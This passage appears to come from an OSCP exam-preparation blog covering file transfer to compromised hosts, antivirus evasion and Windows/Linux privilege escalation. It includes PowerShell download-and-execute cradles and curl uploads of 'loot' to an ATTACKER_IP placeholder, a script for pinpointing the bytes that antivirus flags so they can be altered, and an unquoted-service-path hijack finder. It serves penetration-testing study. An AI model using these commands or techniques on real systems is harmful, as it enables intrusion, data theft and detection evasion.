&lt;p&gt;Depending on the target system you obtain access to, you may not have an easy way to transfer exploits or other tools you need onto it. You will therefore need a few techniques for moving files to and from the target system. Here are the guides and commands I used to get a better understanding of transferring files onto Windows and Linux systems:&lt;/p&gt;

&lt;p&gt;Python modules that run a quick service to transfer files (run them from the directory that holds your tools; binding to ports below 1024 requires root, so use something like 8000 otherwise):&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;python2 -m SimpleHTTPServer 80&lt;/code&gt; spins up a web server serving the current directory on port 80.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;python3 -m http.server 80&lt;/code&gt; is the Python 3 equivalent.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;python2 -m pyftpdlib -p 21 -w&lt;/code&gt; spins up an FTP server serving the current directory on port 21 with anonymous login; -w also lets the anonymous user upload (pyftpdlib is a third-party package: pip install pyftpdlib).&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;python3 -m pyftpdlib -p 21 -w&lt;/code&gt; is the Python 3 equivalent.&lt;/li&gt;
  &lt;li&gt;Simple HTTP Server with Upload capabilities: &lt;a href=&quot;https://github.com/tjnull/OSCP-Stuff/blob/master/Transferring-Files/HTTPServerWithUpload.py&quot;&gt;https://github.com/tjnull/OSCP-Stuff/blob/master/Transferring-Files/HTTPServerWithUpload.py&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
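
&lt;p&gt;An upload server is the one piece of that list the standard library does not give you, and it is the piece that needs care: anything on the target’s network can push files into it, so the file name from the request must never be allowed to choose where on your Kali box the data lands. The following is an added example (my own code, not the HTTPServerWithUpload.py linked above): GET behaves like python3 -m http.server, PUT or POST to /name stores the body as name inside uploads/, and safe_target() reduces whatever name the client sent to a single file name inside that directory, rejecting ../, URL-encoded %2e%2e and backslash variants. The port, the uploads directory name and the ATTACKER_IP placeholder in the usage note are assumptions.&lt;/p&gt;

```python
"""HTTP file drop: GET serves the current directory, PUT/POST stores uploads (added example)."""
import os
import posixpath
import sys
import urllib.parse
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer


def safe_target(upload_dir, requested_path):
    """Map a client-chosen path onto upload_dir. Returns the absolute destination, or
    None when the name is empty or would escape upload_dir (../, %2e%2e, backslashes)."""
    name = urllib.parse.unquote(requested_path.split("?", 1)[0]).replace("\\", "/")
    name = posixpath.normpath("/" + name).lstrip("/")   # collapses ../ and ./ segments
    name = posixpath.basename(name)                     # keep only the final component
    if name in ("", ".", ".."):
        return None
    root = os.path.realpath(upload_dir)
    dest = os.path.realpath(os.path.join(root, name))
    if os.path.dirname(dest) != root:                   # belt and braces: must sit directly in root
        return None
    return dest


class DropHandler(SimpleHTTPRequestHandler):
    """GET behaves like python3 -m http.server; PUT/POST /name saves the body as name."""
    upload_dir = "uploads"

    def do_PUT(self):
        length = int(self.headers.get("Content-Length") or 0)
        dest = safe_target(self.upload_dir, self.path)
        if dest is None:
            self.send_error(400, "Refusing that file name")
            return
        os.makedirs(self.upload_dir, exist_ok=True)
        with open(dest, "wb") as handle:
            handle.write(self.rfile.read(length))
        self.log_message("stored %d bytes in %s", length, dest)
        self.send_response(201)
        self.send_header("Content-Length", "0")
        self.end_headers()

    do_POST = do_PUT


def make_server(port=8000, upload_dir="uploads", bind="0.0.0.0"):
    """Build (but do not start) the server; call .serve_forever() on the result."""
    DropHandler.upload_dir = upload_dir
    return ThreadingHTTPServer((bind, port), DropHandler)


if __name__ == "__main__":
    listen_port = int(sys.argv[1]) if len(sys.argv) == 2 else 8000
    server = make_server(listen_port)
    print(f"serving {os.getcwd()} on port {listen_port}; uploads land in ./{DropHandler.upload_dir}/")
    server.serve_forever()
```

From a Linux target: `curl -T loot.txt http://ATTACKER_IP:8000/loot.txt`; from PowerShell: `Invoke-WebRequest -Uri http://ATTACKER_IP:8000/loot.txt -Method Put -InFile loot.txt -UseBasicParsing`. There is no authentication, so start it when you need it and stop it when you are done.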

&lt;p&gt;Tools to transfer files on Windows:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;PowerShell: 
Downloading a file from your host to disk on the target (the second argument is the destination path, relative to the current directory unless you make it absolute): &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;powershell (New-Object System.Net.WebClient).DownloadFile(&apos;http://ATTACKER_IP/update.exe&apos;, &apos;msi-installer.exe&apos;)&lt;/code&gt;
Downloading a PowerShell script and executing it in memory with Invoke-Expression, so nothing is written to disk (this only works for scripts, not for .exe files): &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;powershell IEX (New-Object System.Net.WebClient).DownloadString(&apos;http://ATTACKER_IP/script.ps1&apos;)&lt;/code&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;bitsadmin. The tool is a command-line tool that you can use to create download or upload jobs and monitor their progress. You can find examples on how to use the tool here: 
&lt;a href=&quot;https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-examples&quot;&gt;https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-examples&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;robocopy: &lt;a href=&quot;https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy&quot;&gt;https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;certutil: &lt;a href=&quot;https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil&quot;&gt;https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For Windows 10 and Server 2016/2019. Note that inside Windows PowerShell the name &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;wget&lt;/code&gt; is only an alias for Invoke-WebRequest, which does not take GNU wget switches such as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-b&lt;/code&gt; or &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--ftp-user&lt;/code&gt;; there use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Invoke-WebRequest -Uri http://127.0.0.1/file.exe -OutFile msi-install.exe&lt;/code&gt;. The forms below are GNU wget syntax (a real wget.exe on the target, or your own Linux box):&lt;/p&gt;

&lt;p&gt;wget:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;wget http://127.0.0.1/file.exe&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;wget -O msi-install.exe http://127.0.0.1/file.exe&lt;/code&gt; (capital &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-O&lt;/code&gt; names the output file; lower-case &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-o&lt;/code&gt; names a log file)&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;wget -b http://127.0.0.1/file.exe&lt;/code&gt; (download in the background)&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;wget --ftp-user=User --ftp-password=Password ftp://127.0.0.1/file.exe -O msi-install.exe&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
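&lt;p&gt;A minimal upload receiver for the Linux side, in the spirit of the HTTPServerWithUpload.py linked above but written fresh for this page (it is an added example, not the linked script): it accepts a multipart POST, refuses path traversal in the client-supplied filename, and prints the SHA-256 of every file so it can be compared with Get-FileHash on the Windows side before you trust the copy. The directory name, the port and the sample request in the comments are assumptions.&lt;/p&gt;

```python
import hashlib
import os
import re
from email.parser import BytesParser
from email.policy import default
from http.server import BaseHTTPRequestHandler, HTTPServer

UPLOAD_DIR = "uploads"      # assumed destination directory on the attacker box


def safe_name(filename):
    """Reduce a client-controlled filename to one safe path component.
    A Windows client may send back-slashes; '..' segments and leading dots are dropped."""
    base = os.path.basename(filename.replace("\\", "/"))
    base = re.sub(r"[^A-Za-z0-9._-]", "_", base).lstrip(".")
    return base or "upload.bin"


def extract_uploads(content_type, body):
    """Parse a multipart/form-data request body with the stdlib email parser
    (the cgi module is gone in Python 3.13).  Returns [(safe filename, bytes), ...]
    for every part that carries a filename."""
    head = ("Content-Type: " + content_type + "\r\n\r\n").encode("latin-1")
    msg = BytesParser(policy=default).parsebytes(head + body)
    uploads = []
    for part in msg.iter_parts():
        name = part.get_filename()
        if name:
            uploads.append((safe_name(name), part.get_payload(decode=True)))
    return uploads


def digest_line(name, data):
    """One report line per file; compare the digest with Get-FileHash on the sender."""
    return name + "  " + hashlib.sha256(data).hexdigest()


class UploadHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length)
        os.makedirs(UPLOAD_DIR, exist_ok=True)
        report = []
        for name, data in extract_uploads(self.headers.get("Content-Type", ""), body):
            with open(os.path.join(UPLOAD_DIR, name), "wb") as fh:
                fh.write(data)
            report.append(digest_line(name, data))
            print(report[-1])
        reply = ("\n".join(report) + "\n").encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)


if __name__ == "__main__":
    # python3 upload_server.py, then from the target (placeholder address):
    #   curl.exe -F "file=@C:\loot.txt" http://ATTACKER_IP:8000/
    HTTPServer(("0.0.0.0", 8000), UploadHandler).serve_forever()
```

&lt;p&gt;From the target, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;curl.exe -F &quot;file=@C:\loot.txt&quot; http://ATTACKER_IP:8000/&lt;/code&gt; does the upload (curl.exe ships with Windows 10 1803 and later; the .exe matters because in Windows PowerShell the bare name curl is another alias for Invoke-WebRequest). Then compare the digest the server printed with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Get-FileHash C:\loot.txt -Algorithm SHA256&lt;/code&gt; on the Windows side; a mismatch means a truncated or mangled transfer, which is far more common over flaky shells than people expect.&lt;/p&gt;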

&lt;p&gt;Other Tools/Resources:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Updog: &lt;a href=&quot;https://github.com/sc0tfree/updog&quot;&gt;https://github.com/sc0tfree/updog&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Pwndrop: &lt;a href=&quot;https://github.com/kgretzky/pwndrop&quot;&gt;https://github.com/kgretzky/pwndrop&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;Awakened: Transfer files from Kali to the target machine
&lt;a href=&quot;https://awakened1712.github.io/oscp/oscp-transfer-files/&quot;&gt;https://awakened1712.github.io/oscp/oscp-transfer-files/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Ropnop Transferring Files from Linux to Windows (post-exploitation):
&lt;a href=&quot;https://blog.ropnop.com/transferring-files-from-kali-to-windows/&quot;&gt;https://blog.ropnop.com/transferring-files-from-kali-to-windows/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-14-antivirus-bypassing&quot;&gt;Section 14: Antivirus Bypassing&lt;/h1&gt;
&lt;p&gt;I did not spend too much time on this section, since Metasploit encodes its payloads and that was enough against older anti-virus engines. Bear in mind that msfvenom encoders exist to avoid bad characters rather than to evade detection, and current engines flag encoded Metasploit output immediately, so anything beyond the course material will need the tools below. The course is pretty straightforward in this section.&lt;/p&gt;

&lt;p&gt;Tools to play with Anti-Virus evasion:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Veil-Framework: &lt;a href=&quot;https://github.com/Veil-Framework/Veil&quot;&gt;https://github.com/Veil-Framework/Veil&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Shellter: &lt;a href=&quot;https://www.shellterproject.com/&quot;&gt;https://www.shellterproject.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Unicorn &lt;a href=&quot;https://github.com/trustedsec/unicorn&quot;&gt;https://github.com/trustedsec/unicorn&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;UniByAV: &lt;a href=&quot;https://github.com/Mr-Un1k0d3r/UniByAv&quot;&gt;https://github.com/Mr-Un1k0d3r/UniByAv&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tools to play with for Obfuscation:&lt;/p&gt;

&lt;p&gt;PowerShell:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Invoke-Obfuscation: &lt;a href=&quot;https://github.com/danielbohannon/Invoke-Obfuscation&quot;&gt;https://github.com/danielbohannon/Invoke-Obfuscation&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Chimera: &lt;a href=&quot;https://github.com/tokyoneon/Chimera&quot;&gt;https://github.com/tokyoneon/Chimera&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Python:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Pyarmor: &lt;a href=&quot;https://pypi.org/project/pyarmor/&quot;&gt;https://pypi.org/project/pyarmor/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;PyObfx: &lt;a href=&quot;https://github.com/PyObfx/PyObfx&quot;&gt;https://github.com/PyObfx/PyObfx&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;C#:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;ConfuserEx: &lt;a href=&quot;https://github.com/yck1509/ConfuserEx&quot;&gt;https://github.com/yck1509/ConfuserEx&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Testing payloads. Keep in mind that samples submitted to online scanners may be shared with AV vendors, so never upload a payload you intend to use on an engagement; the last three entries (AVET, DefenderCheck and ThreatCheck) run locally instead, and the latter two report which bytes your own Defender installation objects to:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Nodistribute: &lt;a href=&quot;https://nodistribute.com&quot;&gt;https://nodistribute.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Virustotal: &lt;a href=&quot;https://www.virustotal.com/gui/home&quot;&gt;https://www.virustotal.com/gui/home&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Hybrid-Analysis: &lt;a href=&quot;https://www.hybrid-analysis.com&quot;&gt;https://www.hybrid-analysis.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Any-Run: &lt;a href=&quot;https://app.any.run&quot;&gt;https://app.any.run&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Reverse.it: &lt;a href=&quot;https://reverse.it&quot;&gt;https://reverse.it&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Anti-Virus Evasion Tool: &lt;a href=&quot;https://github.com/govolution/avet&quot;&gt;https://github.com/govolution/avet&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;DefenderCheck: &lt;a href=&quot;https://github.com/matterpreter/DefenderCheck&quot;&gt;https://github.com/matterpreter/DefenderCheck&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;ThreatCheck: &lt;a href=&quot;https://github.com/rasta-mouse/ThreatCheck&quot;&gt;https://github.com/rasta-mouse/ThreatCheck&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
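&lt;p&gt;How DefenderCheck and ThreatCheck find the bytes an engine objects to: scan shrinking prefixes of the file with a half-interval search until the shortest still-flagged prefix is found, then dump the bytes just before that offset. This is an added example written for this page, not the tools’ own code. The scanner here is a constructed stand-in that flags a fixed string, where the real tools hand each slice to the local engine (MpCmdRun.exe or the AMSI API); the sample buffer and the bad string in it are made up.&lt;/p&gt;

```python
def find_flagged_prefix(sample, is_flagged):
    """Length of the shortest prefix of `sample` that the scanner still flags,
    i.e. the offset just past the bytes that trigger the signature.
    None if the whole sample is clean.  Assumes the scanner is deterministic and
    does not flag the empty buffer; each probe costs one scanner call, so a
    1 MB file needs about 20 scans instead of a million."""
    if not is_flagged(sample):
        return None
    lo, hi = 0, len(sample)            # invariant: sample[:lo] clean, sample[:hi] flagged
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if is_flagged(sample[:mid]):
            hi = mid
        else:
            lo = mid
    return hi


def flagged_context(sample, end, width=32):
    """The bytes immediately before the detection offset; this is what you edit or encode."""
    return sample[max(0, end - width):end]


def hexdump(data, base=0):
    """Classic offset / hex / ASCII listing, like the output ThreatCheck prints."""
    rows = []
    for i in range(0, len(data), 16):
        chunk = data[i:i + 16]
        hexpart = " ".join("%02x" % b for b in chunk)
        text = "".join(chr(b) if 126 >= b >= 32 else "." for b in chunk)
        rows.append("%08x  %-47s  %s" % (base + i, hexpart, text))
    return "\n".join(rows)


def stub_scanner(signature):
    """Constructed stand-in for the AV engine: flags any buffer containing `signature`.
    DefenderCheck/ThreatCheck instead write each slice to disk and ask the local engine
    (MpCmdRun.exe -Scan, or AmsiScanBuffer) whether it is detected."""
    def is_flagged(buf):
        return signature in buf
    return is_flagged


# Constructed sample: benign filler with a known "bad" string buried at offset 1024.
BAD = b"CONSTRUCTED-BAD-STRING"
SAMPLE = bytes(range(256)) * 4 + BAD + bytes(range(256)) * 2


def locate(sample=SAMPLE, is_flagged=stub_scanner(BAD)):
    """Return (end offset, context bytes) for the flagged region, or None if clean."""
    end = find_flagged_prefix(sample, is_flagged)
    if end is None:
        return None
    return end, flagged_context(sample, end)


if __name__ == "__main__":
    result = locate()
    if result is None:
        print("sample not flagged")
    else:
        end, ctx = result
        print("scanner starts flagging at offset 0x%x" % end)
        print(hexdump(ctx, end - len(ctx)))
```

&lt;p&gt;Once you have the offset the fix is local: change or encode those bytes (rename the string, rebuild) and rerun until the file comes back clean. A real detection may have several components, so repeat the search after every change rather than assuming one edit is enough, and do this only on your own test VM with cloud-delivered protection and automatic sample submission switched off, otherwise the slices themselves get uploaded.&lt;/p&gt;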

&lt;h1 id=&quot;section-15-privilege-escalation&quot;&gt;Section 15: Privilege Escalation&lt;/h1&gt;
&lt;p&gt;In this section you will see a range of techniques for obtaining administrative access, from kernel exploits to misconfigured services. The possibilities are endless, so make sure you find the ones that work for you. To get a feel for this section I recommend applying your knowledge on VulnHub or HackTheBox machines. There are scripts that automate the enumeration, but they can miss something important on your target that you need to escalate your privileges, so learn the manual checks as well :D.&lt;br /&gt;
For this section I am going to break it into two parts: Windows and Linux privilege escalation techniques.&lt;/p&gt;

&lt;h5 id=&quot;windows-privilege-escalation-guides&quot;&gt;Windows Privilege Escalation Guides:&lt;/h5&gt;
&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;Fuzzysecurity Windows Privilege Escalation Fundamentals: Shout out to fuzzysec for taking the time to write this because this is an amazing guide that will help you understand Privilege escalation techniques in Windows. 
&lt;a href=&quot;http://www.fuzzysecurity.com/tutorials/16.html&quot;&gt;http://www.fuzzysecurity.com/tutorials/16.html&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Pwnwiki Windows Privilege Escalation Commands: 
&lt;a href=&quot;http://pwnwiki.io/#!privesc/windows/index.md&quot;&gt;http://pwnwiki.io/#!privesc/windows/index.md&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Absolomb’s Security Blog: Windows Privilege Escalation Guide
&lt;a href=&quot;https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/&quot;&gt;https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Pentest.blog: Windows Privilege Escalation Methods for Pentesters
&lt;a href=&quot;https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/&quot;&gt;https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;PayloadAllTheThings: &lt;a href=&quot;https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md&quot;&gt;https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;SharpAllTheThings: &lt;a href=&quot;https://github.com/N7WEra/SharpAllTheThings&quot;&gt;https://github.com/N7WEra/SharpAllTheThings&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;LOLBAS (Created by Oddvar Moe): &lt;a href=&quot;https://lolbas-project.github.io/&quot;&gt;https://lolbas-project.github.io/&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Windows Privilege Escalation Tools:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;JAWS (Created by 411Hall): A cool Windows enumeration script written in PowerShell. 
&lt;a href=&quot;https://github.com/411Hall/JAWS&quot;&gt;https://github.com/411Hall/JAWS&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Windows Exploit Suggester Next Generation: &lt;a href=&quot;https://github.com/bitsadmin/wesng&quot;&gt;https://github.com/bitsadmin/wesng&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Sherlock (Created by RastaMouse): Another cool PowerShell script that finds missing software patches for local privilege escalation techniques in Windows. 
&lt;a href=&quot;https://github.com/rasta-mouse/Sherlock&quot;&gt;https://github.com/rasta-mouse/Sherlock&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;WinPeas: &lt;a href=&quot;https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS&quot;&gt;https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Watson: &lt;a href=&quot;https://github.com/rasta-mouse/Watson&quot;&gt;https://github.com/rasta-mouse/Watson&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Seatbelt: &lt;a href=&quot;https://github.com/GhostPack/Seatbelt&quot;&gt;https://github.com/GhostPack/Seatbelt&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Powerless: &lt;a href=&quot;https://github.com/M4ximuss/Powerless&quot;&gt;https://github.com/M4ximuss/Powerless&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Powerview: &lt;a href=&quot;https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon&quot;&gt;https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Token Manipulation:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;Rotten Potato: &lt;a href=&quot;https://github.com/breenmachine/RottenPotatoNG&quot;&gt;https://github.com/breenmachine/RottenPotatoNG&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Juicy Potato: &lt;a href=&quot;https://github.com/ohpe/juicy-potato&quot;&gt;https://github.com/ohpe/juicy-potato&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other Resources for Windows Privilege Escalation Techniques: 
&lt;a href=&quot;https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194&quot;&gt;https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194&lt;/a&gt;&lt;/p&gt;
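&lt;p&gt;One of the classic checks from the guides above, unquoted service paths, as an added example written for this page (not code from any of the tools listed): given the service table exported from the target, it lists the executables Windows would try before the real one. The CSV sample is constructed in the shape that &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Get-CimInstance Win32_Service | Select-Object Name,PathName,StartMode | ConvertTo-Csv -NoTypeInformation&lt;/code&gt; produces; the service names and paths in it are made up.&lt;/p&gt;

```python
import csv
import io
import re

# Constructed sample in the shape produced on the target by:
#   Get-CimInstance Win32_Service | Select-Object Name,PathName,StartMode | ConvertTo-Csv -NoTypeInformation
SAMPLE_CSV = r'''"Name","PathName","StartMode"
"BackupAgent","C:\Program Files\Acme Backup\Agent\agent.exe -service","Auto"
"Spooler","C:\Windows\System32\spoolsv.exe","Auto"
"QuotedSvc","""C:\Program Files\Quoted Vendor\svc.exe"" --run","Auto"
"VulnUpdater","C:\Tools\Update Service\updater.exe","Manual"
'''

IMAGE_RE = re.compile(r"(.*?\.exe)", re.IGNORECASE)   # everything up to the first .exe


def parse_service_csv(text):
    """Rows as dicts keyed by the CSV header (Name, PathName, StartMode)."""
    return list(csv.DictReader(io.StringIO(text)))


def hijack_candidates(pathname):
    r"""Paths the service control manager tries before the real image.
    For an unquoted command line CreateProcess splits at each space and tries every
    prefix with .exe appended, so C:\Program Files\Acme Backup\Agent\agent.exe is
    preceded by C:\Program.exe and C:\Program Files\Acme.exe; a writable directory
    on that list lets a low-privileged user plant a binary that runs as the service
    account the next time the service starts."""
    pathname = pathname.strip()
    if pathname.startswith('"'):            # quoted image path: nothing to split
        return []
    m = IMAGE_RE.match(pathname)
    image = m.group(1) if m else pathname.split(" ")[0]   # heuristic: image ends at the first .exe
    parts = image.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def unquoted_service_paths(csv_text):
    """{service name: [candidate paths]} for every service whose image path is unquoted and contains a space."""
    findings = {}
    for row in parse_service_csv(csv_text):
        candidates = hijack_candidates(row["PathName"])
        if candidates:
            findings[row["Name"]] = candidates
    return findings


if __name__ == "__main__":
    rows = {r["Name"]: r for r in parse_service_csv(SAMPLE_CSV)}
    for name, candidates in unquoted_service_paths(SAMPLE_CSV).items():
        print("%s (StartMode=%s)" % (name, rows[name]["StartMode"]))
        for c in candidates:
            print("    check write access to the directory of", c)
```

&lt;p&gt;Copy the CSV off the target, or paste the output into a file, and run this on Kali. Each candidate’s parent directory is then checked with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;icacls&lt;/code&gt; for write access by your user, Users or Authenticated Users. A hit is only useful if the service restarts: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sc stop&lt;/code&gt; / &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sc start&lt;/code&gt; if the service ACL allows it, otherwise at the next reboot for StartMode=Auto services, which is why the start mode is printed next to the name.&lt;/p&gt;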

&lt;h5 id=&quot;linux-privilege-escalation-guides&quot;&gt;Linux Privilege Escalation Guides:&lt;/h5&gt;
&lt;p&gt;The only guide I ever really needed to understand privilege escalation techniques on Linux systems was g0tmi1k’s post. In my opinion this blog is a must-read for everyone preparing for the OSCP. You can find his guide here: 
&lt;a href=&quot;https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/&quot;&gt;https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;GTFOBins (I have to thank Ippsec for sharing this with me): a curated list of Unix binaries that an attacker can abuse to bypass local security restrictions on a Linux system, for example through sudo rules, SUID bits or capabilities.
&lt;a href=&quot;https://gtfobins.github.io/&quot;&gt;https://gtfobins.github.io/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;PayloadsAllTheThings Linux Priv Esc Guide: 
&lt;a href=&quot;https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md&quot;&gt;https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md&lt;/a&gt;&lt;/p&gt;

&lt;h5 id=&quot;linux-privilege-escalation-tools&quot;&gt;Linux Privilege Escalation Tools:&lt;/h5&gt;
&lt;p&gt;LinEnum: A great Linux privilege escalation checker from the guys at rebootuser.com. You can find their tool here: 
&lt;a href=&quot;https://github.com/rebootuser/LinEnum&quot;&gt;https://github.com/rebootuser/LinEnum&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;Linux Exploit Suggester 2: &lt;a href=&quot;https://github.com/jondonas/linux-exploit-suggester-2&quot;&gt;https://github.com/jondonas/linux-exploit-suggester-2&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;LinPEAS: &lt;a href=&quot;https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS&quot;&gt;https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;One thing that I will mention is that if you want to practice your Linux privilege escalation, I highly recommend you take a look at the Lin.Security vulnerable box created by in.security! The box was designed to help people understand how certain applications and services that are misconfigured can be easily abused by an attacker. This box really helped me improve my privilege escalation skills and techniques on Linux systems.&lt;/p&gt;

&lt;ul&gt;
